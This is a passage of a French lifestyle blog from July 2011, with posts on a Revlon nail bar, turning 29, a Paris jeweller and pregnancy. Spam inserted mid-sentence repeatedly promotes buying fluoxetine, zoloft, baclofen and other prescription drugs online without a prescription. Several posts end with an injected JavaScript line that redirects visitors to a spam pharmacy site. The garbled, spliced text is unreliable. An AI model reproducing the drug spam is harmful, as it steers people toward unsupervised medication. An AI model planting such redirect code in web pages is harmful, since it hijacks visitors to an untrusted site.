Lip & Nail Bar Revlon au Drugstore Publicis, jusqu’au 15 août

19 juillet 2011 par  
Classé dans A la Une, Beauté, Bon plan

nailbarRevlon

Je vous parlais il y a quelques jours des vernis Revlon, ma belle redécouverte du moment

Et bien j’ai une très bonne nouvelle, un bon plan parisien dont il faut profiter au plus vite : le Lip & Nail Bar Revlon …

lipnailbarrevlon

L’occasion de découvrir tous les vernis Revlon, dont les Revlon Scented : des vernis qui se parfument en séchant – j’étais très sceptique mais ça marche vraiment !

revlon-scented buy cheap atarax, atarax tablets, hydroxyzine 25, hydroxyzine 25 mg, hydroxyzine 25mg, cheap hydroxyzine, order hydroxyzine online.

Au programme également, les Revlon Top Speed, séchage en 60 secondes chrono – testé et approuvé, gros coup de coeur pour le Stormy d’ailleurs  (à voir chez Poupoune in Make up Land)- on pose une premiere couche et le temps de faire les 10 ongles on peut attaquer directement la seconde couche, c’est vraiment sec très vite …

revlontopspeed

On peut aussi retrouver les LipGloss Revlon Colorburst, des gloss qui tiennent longtemps, hydratent, et ne collent pas. Moi qui avais abandonné depuis un bon moment les gloss je m’y remet !

levres-revlon

Et le bon plan dans tout ça, me direz-vous …
Et bien c’est la pose de vernis “buy cheap generic fluoxetine online without prescription” 96 reviews submitted., jan 21, 2014 – fluoxetine is the generic name for prozac , a medication  !

Si vous souhaitez juste vous  faire poser le vernis c’est 8 Euros, mais si vous craquez pour 2 vernis (ce qui peut arriver, personne n’est à l’abri …) la pose est offerte.
En plus, vous rencontrerez une experte Revlon (dont j’ai lamentablement oublié le prénom) qui vous donnera plein de petites astuces. Tiens, par exemple, une fois qu’un vernis est trop sec, pâteux, qu’il a changé de couleur, vous pouvez le mettre à la poubelle. Dissolvants ou solvants ne pourront rien y faire … L’astuce du frigo ? Bof bof selon l’experte Revlon …

3 days ago – how much baclofen is too much gabapentin and baclofen recrea. this forum online baclofen kopen buy baclofen online no prescription

Rendez-vous donc

jusqu’au 15 aout,

du jeudi au dimanche,

au Drugstore Publicis,

best prices for all customers! amoxil generic name . free delivery, buy amoxil without prescription. 133 avenue des Champs-Elysées, Paris 8.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

29 ans, le meilleur est à venir !

17 juillet 2011 par  
Classé dans A la Une, Lifestyle, Socio

29ans600400

Crédit photo : Sally Mann

Il y a deux ans sur Caractérielles, nous avions sollicité avec Anne Claire quelques belles plumes à l’occasion d’une saga de l’été, l’idée était de parler de son rapport à l’âge. J’ai repensé à ça après avoir fêté (dignement) mes 29 ans mercredi soir, entourée de personnes que j’aime (certains nous ont manqué, ils se reconnaitront et qu’ils ne s’inquiètent pas, ce n’est que partie remise !) et en relisant les beaux articles d’Amandine et d’Anne Sotte, l’envie m’a pris d’en faire autant.

Alors concrètement, à 29 balais, on en est où ?

– Il est clair que je me sens plus accomplie qu’à 20 ou 25 ans. Pour moi, l’un des premiers faits qui m’a fait dire « putain, ça y est, je suis adulte » est d’avoir envoyé mon 1er pli aux impôts. Et aussi de mettre un peu le nez dans les histoires de Sécu, de Mutuelle et autres réjouissances. Avant, tout ça, c’était super mummy qui gérait.

– Je serai toujours la petite dernière de la famille, même lorsque je fêterai mes 60 ans. Celle qu’on chouchoute un peu plus (maintenant je peux l’avouer) mais qu’on accuse gentiment (et souvent à raison !) lorsqu’il manque un mascara YSL dans le vanity de maman.

– Je me sens plus mûre face à mes responsabilités et aux décisions que je dois prendre. Lorsqu’on souhaite changer de job et que mes parents me disent « Oh mais fais gaffe, avec la crise, les temps sont rudes, on sait ce qu’on perd, jamais ce qu’on gagne », on a tendance à dire « oui, oui, t’inquiète pas », tout en sachant que même si on se plante, on se relèvera. Devenir adulte quoi …

– Je me sens épanouie et de plus en plus en confiance dans ma nouvelle vie professionnelle. Un job stimulant, parfois (souvent !) très rythmé, une équipe en or et la perspective de vivre encore plein de belles choses.

– Je me connais mieux, je sais quelles sont mes limites, je m’accepte telle que je suis mais ça ne veut pas dire que je ne me cherche pas encore un peu.

– Je suis capable de claquer 300€ pour une belle paire de lunettes de soleil, personne ne viendra m’enguirlander. Peut-être le banquier, mais ça, c’est une autre histoire.

– Je me sens un peu larguée lorsqu’il m’arrive de prêter l’oreille à écouter les moins de 20 ans discuter dans le métro : « Attends laisse tomber, il a encore MSN Messenger ! » « C’est quoi MSN Messenger ? ». No comment.

– On commence à être plutôt calée question benchmark sur les crèmes anti-âge. On sait que c’est important, qu’on commence à voir pointer des petites choses qui ne nous plaisent pas, même si certains nous sortent le sempiternel « t’en as tellement pas besoin ». Ouais mais quand même, on ne sait jamais hein …

– Certaines personnes me regardent parfois d’un œil étrange lorsque je dis que je vis en colocation. Ouais les gars, à Paris, balancer 900€ pour un 20 mètres carrés, merci mais bon … Et puis, il n’y a pas à dire, ma colloc est aussi une amie en or et ça, ça n’a pas de prix, comme dirait l’autre.

– On m’appelle toujours Mademoiselle dans les magasins. Ceci dit, il parait que je ne fais pas mon âge. Ça doit venir du fait que je porte du rose, non ?

– Porter des Reebok violettes et un tee shirt Schtroumpfette ne me fait pas peur (pas en même temps, je vous rassure …) et il peut parfois m’arriver de porter des couettes à la Punky Brewster.

– La boulangère continue à me donner des Carambar en douce. Comme quand j’avais 9 ans et demi quoi.

– On a des potes d’enfance qui sont déjà parents et parlent déjà du « deuxième ». D’autres, après avoir cartonné pendant leurs études secondaires, plaquent tout pour aller ouvrir un resto aux Caraïbes. D’autres lâchent un poste béton dans le marketing pour retourner en Bretagne. D’autres partent faire le tour du monde à vélo. Pas de règles précises en la matière mais on sent que l’approche de la trentaine fait poser pas mal de questions aux gens de ma génération.

– Je suis encore capable de danser sur Lio jusque 8H du mat’ avec ma bande. Il me faut certes un peu plus de temps qu’à 20 ans pour récupérer mais l’envie est bien là et celui ou celle qui m’empêchera de m’exprimer sur des chorés endiablées n’est pas encore né.

Je vous le concède, pas facile de faire des conclusions ! En tous cas, au moment où j’écris ces quelques lignes, je suis heureuse et si je suis heureuse à 29 ans, le fait d’aborder la fameuse trentaine ne me fait pas peur.

Et puis, certains, à 29 ans, semblent tout de même moins bien lotis …

J’en profite pour remercier mes amis/famille/collègues (j’arrête là, on va se croire sur Google +) pour les cadeaux de dingue reçus : du rock, des Strokes, du Paul Smith, des belles robes, de la bonne bouffe … Love love love !

Rendez-vous sur Hellocoton !

Joaillerie Forges : la caverne d’Ali Baba

13 juillet 2011 par  
Classé dans A la Une, Lifestyle, Shopping

buy fluoxetine online , fluoxetine hcl 20 mg side effects, 90 fluoxetine hcl . forges

A 20 ans, j’avais des bagues, des boucles d’oreille, colliers, je me sentais nue quand je n’avais pas mes bijoux. Or jaune, argent, or blanc, j’ai tout fait, je supportais même les bijoux de pacotille et en ai donc bien profité.

En vieillissant / grandissant j’ai fait du tri, je ne porte aujourd’hui qu’un discret collier, des petites boucles et un bracelet très symbolique.

Je préfère l’or blanc aux autres ors et je n’aime pas les pierres. Enfin si, mais une seule sorte : les diamants.

Je regarde de temps en temps les vitrines des bijoutiers mais plus par curiosité que par réelle envie, notez que je suis une fille qui ne coute pas bien cher …

Ou plutôt j’étais, car  les choses sont en train de changer …

Il y a quelques semaines j’ai pu découvrir la bijouterie Forges, créée en 1892 c’est l’une des plus ancienne horlogerie Joaillerie de Paris et elle vient tout juste de dévoiler son nouvel espace très épuré, design … Un espace dessiné par Yohann Uzan, petit neveu du fondateur, expert en gemmologie et réel passionné, voici sa présentation de ce nouvel écrin:

best prices for all customers! zoloft medication cost . cheapest rates, where to buy zoloft online. « J’ai dessiné ma boutique comme je dessine mes bijoux avec des formes simples, légères avec un esprit d’envolée sur les rondeurs. J’ai pris le risque de surprendre en innovant et en réinterprétant le moderne.

dosage range fluoxetine pictures different brands fluoxetine generic prozac fluoxetine mex prescriptions fluoxetine generic fluoxetine lowest dose of fluoxetine Du côté traditionnel et rassurant de notre métier, je n’ai gardé qu’un bois d’ébène aux reflets chatoyants qui se rapproche de la soie. Une matière que je trouve particulièrement sensuelle. buy baclofen online, baclofen 4096 tv street price, baclofen 10 mg 4096. vs benzos 10mg price in south africa procedure for baclofen pump does contain

Un sol blanc, des meubles noirs, pour souligner les formes rondes des murs satinés crème très clair en forme de vague.

Comme un mouvement de montre, un mécanisme de vitrine unique permet d’obtenir une plus grande légèreté de style. Acier brossé, daims ou lustre de Murano privilégient l’émotion, le raffinement et la créativité. »

J’ai vraiment redécouvert la joaillerie à cette soirée. La passion des pierres, le travail de joailler, et je suis tombée en amour une bonne dizaine de fois …

bagues

Et puis, on est d’accord, une femme enceinte qui n’a pas une jolie bague au doigt, ça ne fait pas très sérieux, non ?! 😉

(et non je ne veux pas me marier, mais une jolie bague, quand même, ça claque !)

Pour les gangsters qui passeraient par là, ne vous faites pas de film, pour ouvrir les vitrines il faut l’empreinte de doigt … et qu’il soit à température normale, lâchez donc tout de suite votre tenaille et allez plutôt sur Pole Emploi !

Notez qu’en plus d’être un bon parti (imaginez, des bagues et des diamants à chaque occasion !) Yohann Uzan est un homme de goût , il m’a choisi pour figurer sur le site de sa boutique …

momentdegloire

Alors non, pas la brune, mais la blonde de dos, c’est bien moi, votre dévouée, qui attend son petit sac de diamants en contrepartie … Yohann, si vous me lisez …

Pour vous faire plaisir, ou juste pour admirer le travail :

Forges Boutique 4, avenue de Wagram, 75017 Paris

Tél.:0142278813 www.forgesboutique.fr
window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Ce à quoi j’aurais voulu échapper … Ce à quoi je veux échapper !

4 juillet 2011 par  
Classé dans A la Une, Lifestyle

zoloft is used for treating depression or obsessive-compulsive disorder (ocd). cheapest zoloft online. get discounts on drugs. zoloft brands. journalbaleine estrace online prescriptions with no membership, pittsburgh, cheapest buy estrace generic equivalent , how to buy estrace generic in us, non perscription cheap 

buy baclofen online, lioresal 10 25 wirkstoff, lioresal oral solution price in india. serve para que pump issues lioresal pros tablet lioresal novartis retail price « 5 mois … déjà », version optimiste, « encore 4 mois », version pessimiste … Ca dépend des jours !

Il y a du bon, du moins bon, du « raz le bol » ou du « encore! », en tous cas il s’en passe des choses et s’il y a eu quelques petites déceptions ou passages difficiles il y a aussi beaucoup d’espoir et d’envies pour la suite, petit aperçu …

Ce à quoi j’aurais voulu échapper

Les premiers mois, je ne vais pas en reparler, tout est déjà dit ici.

Les récits d’accouchements boucherie des déjà mamans qui ont apparemment oublié que le 1er accouchement pouvait être un peu angoissant pour les futures mamans … Entendre parler de forceps, de ventouse, d’épisio, ça ne fait pas rêver … Mais je crois que beaucoup de mamans veulent se faire mousser en racontant le cauchemar auquel elles ont survécu … Et étrangement ce sont elles qui en parlent le plus ! Pourtant j’en connais des jeunes mamans pour qui tout s’est très bien passé mais ça marque moins !

Les récits des jamais mamans qui rapportent des histoires / légendes type « elle a perdu son bébé à 8 mois ½ de grossesse », « son bébé est mort dans ses bras », « elle a fait un fausse couche à 7 mois et n’a plus jamais pu avoir d’enfant ». Et ça vient toujours des jamais mamans … On va dire qu’elles ne connaissent pas l’hyper sensibilité des femmes enceintes ou mettre ça juste sur une grosse indélicatesse … En tous cas à cause de ça j’ai bien mis mon bonheur de côté les 3 premiers mois et avec le recul je me dis que c’est vraiment du gâchis … Pas merci !

L’enchainement de rendez-vous médicaux en voyant le petit plus apparaître sur le test de grossesse (ou, pour ma part, sur les 4, on ne sait jamais, des fois qu’il y aurait une erreur …). A savoir : rdv médecin traitant pour prise de sang, rdv gynéco, choix de la maternité à 6 semaines de grossesse – c’est à dire pile quand tu te rends compte qu’il y a quelque chose qui se passe … pas le temps de « savourer » ou d’en profiter vraiment, tout s’enchaine très vite …

– La mine enjouée de la nana de la mairie « vous êtes 2 créateurs d’entreprise ?! Ne vous faites pas d’idée, très très peu de chance d’avoir une place en crèche, vous comprenez, face à un salarié qui est obligé d’aller au bureau vous ne faites pas le poids » … Parce que c’est bien connu, quand on a monté sa boite on ne fout rien et on peut rester à la maison toute la journée …

– Me tromper sur toute la ligne … Je me voyais accoucher en été d’un petit garçon, un petit gemini, comme moi … Faille de l’instinct maternel, je vais avoir une fille en automne, une petite scorpion. Plus à l’opposé de ce que je m’étais toujours imaginé, il n’y a pas … Cette histoire d’instinct maternel commence donc très mal ! Pour la suite, je l’imagine brune aux yeux marrons avec un caractère de porc (qui ressemblera donc beaucoup à son pôpa) je ne suis donc pas à l’abri d’une blonde aux yeux bleus sage comme sa mère une image !

Les amis qui s’éloignent, du jour au lendemain on sent qu’ils se tiennent à distance, pourtant ça n’a rien de contagieux et je suis toujours capable de parler d’autre chose que de ce que j’ai dans le ventre … Quelques déceptions c’est certain …

Les regards tristes de certaines femmes, en un regard on sent que ce qu’elles voient quand elles me croisent n’est pas facile, parfois elles en parlent, parfois elles tournent la tête, étrange sentiment de culpabilité et d’impuissance …

Ce à quoi je veux échapper

Couper les ponts avec les « pas encore parents » … Parmi mes amis très rares sont les jeunes parents, et pourtant mes amis sont mon équilibre, hors de question que je ne me retrouve qu’avec des parents, je veux continuer à me faire des pique nique sur les quais, voir mes copains montrer leurs fesses aux bateaux mouches, parler mecs et potins en terrasse avec mes copines, je ne veux pas me retrouver toujours au parc avec les jeunes mamans à parler d’érythème fessier et de coliques du nourrisson même si, j’en suis sure, ça va aussi ma passionner …

– Je ne veux pas m’entendre dire à des pas encore parents « tu verras, ta vie prendra un autre sens quand tu auras tes enfants ». Déjà parce que ça me rendait dingue d’entendre ça avant, et ensuite parce qu’on ne sait pas forcément qui on a en face de nous : et s’ils ne voulaient pas d’enfant ? et s’ils ne pouvaient pas en avoir ? Et puis très clairement, on passe pour des vieux cons à dire ça … Testé et approuvé !

Je ne veux pas devenir une maman flippée de tout, j’espère que je pourrais confier ma fille à mes parents, à des amis histoire de profiter de la vie à 2, de la vie d’avant, j’espère vraiment que j’en serais capable mais je crois qu’on ne peut jamais rien prévoir, alors je croise les doigts très fort ! (et de toutes façons je crois que si je ne suis pas « volontaire » ma mère serait bien capable de débarquer à Paris et de repartir dans le Sud ma fille sous le bras !). Je veux pouvoir garder ma vie de jeune femme, de compagne sans être une mère à 100% de mon temps (laissez moi y croire au moins !) Mais bon, je sais que les premières séparations vont être terribles et que loin de ma fifille je vais certainement avoir beaucoup de mal à profiter et à ne pas angoisser … Jen suis déjà à me dire que ca va être terrible pour elle de se retrouver toute seule dans sa chambre après avoir passé des mois entiers dans mon ventre …. C’est loin d’être gagné cette histoire …

Les kilos qui restent… Pour l’instant ça va, je suis dans la norme du 1kilo par mois (merci les nausées des premières semaines qui m’ont permis d’avoir du rab – que j’ai bien récupéré of course …) mais je vois déjà les changements (hors ventre), notamment cette couche de cellulite qui semble m’envelopper de la taille jusqu’aux chevilles me transformant en vieille pate à crêpe pleine de grumeaux … Et oui, pas toutes égales face à la grossesse !

Avant de tomber enceinte j’avais déjà des kilos à perdre, alors j’imagine le résultat après l’accouchement, catastrophique … Mais bon, j’essaie de ne pas trop y penser, je pense que j’aurai bien le temps de me morfondre et de chercher THE méthode pour retrouver un corps digne de ce nom !

Les t-shirts à message … Je n’en vois pas l’intérêt. Quand on a un ventre ballon je ne vois pas l’intérêt de mentionner dessus « je porte la vie et c’est magique » « bébé à bord » & co. J’ai pensé, à un moment, que c’était peut-être destiné aux usagers métro/bus, genre « laissez moi la place » mais je me dit finalement que s’ils font vraiment tout pour ne pas lever la tête, ils ne risquent pas de voir le message. Donc non, je ne comprends vraiment pas le pourquoi du comment … Mais si vous avez des pistes, n’hésitez pas, cela reste pour moi un grand mystère …

Je ne veux pas laisser tomber ma boite … Au début je ne me posais même pas la question, mais la répétition de « mais comment tu vas faire après, tu vas arrêter ? Tu vas retourner en agence ? Tu vas redevenir salariée ? Tu ne vas pas pouvoir continuer comme ça …» m’a un peu angoissé. J’ai pourtant des cas d’école à proximité, de très beaux exemples, mais le fait qu’autant de personnes me posent la question m’a fait douter …

illus-grossesse

Ce qui me plait vraiment …

La gentillesse des gens lioresal tablets . lioresal 10 mg. cheap lioresal. generic lioresal. baclofen cost. order lioresal. generic baclofen. purchase lioresal. purchase baclofen online. que je croise / rencontre. Les petites attentions, les regards qui font du bien, les mots gentils, ça fait un bien fou. A une période ou le corps change tous les jours, ou on peut avoir du mal à l’apprivoiser, ou on se pose beaucoup de questions, il y a des mots, des regards qui font du bien. Sans passer pour la malade de service, juste plus de petites attentions … Alors j’en profite pleinement !

Le fait de ne pas être salariée … Déjà parce que j’ai pu avoir un rythme décalé pendant les 4 premiers mois qui ont été vraiment difficiles … En ayant des insomnies de 4 à 9h j’en profitais pour travailler, en décalant mes journées, difficile à faire quand on doit pointer au bureau ! Je ne galère pas non plus quand je dois caler un rdv avec ma sage femme ou que je dois me faire piquer. Sans travailler moins je travaille en différé, je me rends compte de la chance que j’ai … Bon, par contre, les futures mamans, ne me jalousez pas trop vite, je ne vais pas faire de vraie coupure et pour le coup le combo « congés maternité » me fait rêver ! (oui, il y a encore beaucoup de boulot quant aux gérantes d’entreprises enceintes, un scandale même ….)

– La solidarité des futures / jeunes mamans. On en a des questions les premiers mois de grossesse, et j’iamgine que c’est pareil voir pire après, alors un petit message, un SOS, une question, sur Twitter ou sur Facebook, le coup de fil passé à une jeune maman, le café pris avec une future maman, tout ça, ça fait du bien. Ca rassure, on partage, c’est bien plus concret que dans les livres …

Le fait d’imaginer, se projeter … Comment elle sera, est-ce qu’elle aura les grands pieds de son père et les oreilles pourries de sa mère ? L’intelligence de sa mère et la logique de son père ? Est-ce qu’elle aura des cheveux ou rien sur le caillou ? Est-ce qu’elle sera calme ou agitée du bocal ? Bref, la chasse aux paris est ouvertes … Le rapprochement avec le futur papa, on est vraiment tous les 2 dans cette histoire et pour l’instant c’est plutôt chouette, on réussit à avoir une vie normale, à parler d’autres choses, on n’a pas encore viré gaga / flippés de tout, profitons en !

– Et puis, surtout, le fait de me « sentir capable » … Oui je suis capable d’être enceinte, d’avoir un bébé pour qui tout se passe bien pour le moment, je suis capable de devenir raisonnable en ayant une vie plus équilibrée et un rythme moins intense, je suis capable de penser à quelqu’un d’autre, de penser à cette petite fille avant de penser à moi, je suis déjà capable de faire des choses pour elle et pas pour moi. Je me suis habituée à ne plus vraiment être seule, ça fait 5 mois qu’on cohabite elle et moi, ça n’est pas rien pour la grande solitaire que je suis. J’avais peur, avant, d’en avoir marre, de me lasser, pour l’instant ça va, mais je sais que les 4 prochains mois ne vont pas être de tout repos, mais là encore, je me sens capable …

Les belles illustrations de ce billet viennent de la BD Journal d’une Baleine, de Manboou que je dois acheter au plus vite tant les illustrations me plaisent ! Plus d’infos par ici

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !